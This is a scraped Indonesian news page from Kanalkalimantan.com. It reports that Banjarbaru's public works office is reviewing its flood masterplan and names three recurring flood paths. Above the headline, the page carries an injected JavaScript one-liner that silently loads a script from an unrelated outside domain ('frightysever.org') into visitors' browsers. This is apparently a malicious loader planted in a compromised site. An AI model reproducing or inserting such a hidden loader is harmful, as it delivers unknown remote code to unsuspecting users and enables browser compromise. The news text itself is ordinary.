(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Tiga Jalur Banjir di Ibu Kota, DPUPR Banjarbaru Siapkan Penanganan Hulu ke Hilir


KANALKALIMANTAN.COM, BANJARBARU – Memasuki tahun 2024, Dinas Pekerjaan Umum Penataan Ruang (DPUPR) Kota Banjarbaru melaksanakan review masterplan penanganan banjir di Ibu Kota Provinsi Kalimantan Selatan (Kalsel).

DPUPR Banjarbaru akan kembali menyelesaikan sejumlah persoalan banjir sesuai dengan masterplan penanganan banjir.

Kepala Bidang Sumber Daya Air (SDA) DPUPR Banjarbaru, M Deny Pramudji mengatakan, dalam beberapa yang lalu pihak konsultan telah melaporkan terkait masterplan tersebut kepada PUPR.

Baca juga: Aturan Ramadan di Banjarmasin: THM Tutup hingga Pengaturan Pengeras Suara Masjid dan Musholla

Kabid SDA DPUPR Banjarbaru, M Deny Pramudji. Foto : wanda

“Lalu kita review untuk masterplan itu, seperti ada beberapa catatan yang kita ingin perbaikan dari konsultan,” ungkap Kabid SDA kepada Kanalkalimantan.com, Senin (11/3/2024).

Di dalam masterplan itu, dijelaskannya, pihak konsultan memetakan titik-titik yang berpotensi banjir di Kota Banjarbaru.

Lalu PUPR, kata dia, akan mengajukan review isinya terkait bagaimana penanganan banjir yang cocok dilakukan pada tahun pertama, tahun kedua, ketiga, keempat bahkan tahun kelima dan dilakukan dari hulu ke hilir.

“Titik-titik potensi banjir yang kita lihat dari masterplan itu sebenarnya ada tiga jalur yang kerap dilalui oleh banjir, pertama dari Sungai Besar menuju ke Sungai Kemuning sampai ke Lokudat atau jembatan Sapta Marga dan terus ke belakangnya bagian hilir,” jelas dia.

Baca juga: Dua Warga Mataraman Ditangkap Satresnarkoba Banjarmasin

Kemudian ada jalur dua yang berada di kawasan Sungai Tonhar, menuju Sungai Kelantan dan berakhir di kawasan dua jembatan kecil di Kecamatan Liang Anggang.

Sedangkan di jalur tiga banjir yang kerap melewati dari kawasan Gunung Kupang, menuju Sungai Basung, Sungai Cempaka dan berakhir ke kawasan Banyu Irang menuju ke Maluka Pelaihari.

“Untuk penanganannya kita SDA sudah jelas mengacu masterplan tersebut yakni penanganan dari hulu sampai ke hilir, tinggal di lapangannya lagi kita laksanakan hasil dari review masterplan tersebut,” sambungnya.

Dalam penanganan di lapangan itu pula, sambungnya, pihaknya turut melakukan perbaikan lain seperti perbaikan siring-siring sungai termasuk normalisasi sungai.

Baca juga: Proyek Embung Gunung Kupang Masuk Tahap Pemeliharaan

“Melalui masterplan itu jika sudah sesuai, akan kita lakukan tahapan-tahapan di lapangan, sekaligus ada perbaikan siring segala macam akan kita lakukan juga hingga kepada normalisasi sungai, dan segala macamnya,” tuntas Deny. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

47 menit ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

3 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

3 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

3 jam ago

Wagub Edy Pratowo Maju Pilkada Kalteng, Siap Dipasang Posisi Apapun

KANALKALIMANTAN.COM, PALANGKARAYA - Wakil Gubernur (Wagub) Kalimantan Tengah (Kalteng), Edy Pratowo, mengumumkan keputusannya untuk mendaftarkan… Read More

4 jam ago

Target Juara Umum Popda Kalsel 2024, Aditya Janji Beri Bonus Pribadi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin melepas 109 atlet untuk berlaga dalam… Read More

4 jam ago

This website uses cookies.